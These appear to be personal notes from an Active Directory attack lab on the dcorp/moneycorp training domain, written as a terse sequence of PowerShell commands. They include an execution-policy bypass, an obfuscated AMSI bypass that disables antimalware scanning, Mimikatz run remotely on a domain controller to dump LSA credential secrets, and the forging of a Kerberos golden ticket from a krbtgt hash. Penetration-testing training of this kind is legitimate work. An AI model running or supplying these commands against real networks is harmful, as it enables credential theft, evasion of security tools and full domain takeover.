powershell -ep bypass

Getting Session to DC

$sess = New-PSSession -ComputerName dcorp-dc
Enter-PSSession $sess

AMSI Bypass

sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Mimikatz in DC Session

Invoke-Command -FilePath .\\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession $sess
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/5ef72207-b014-4427-928b-763940417450/Untitled.png

Golden Ticket

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3
219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:502 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

can verify that ticket has been made

klist

We can access it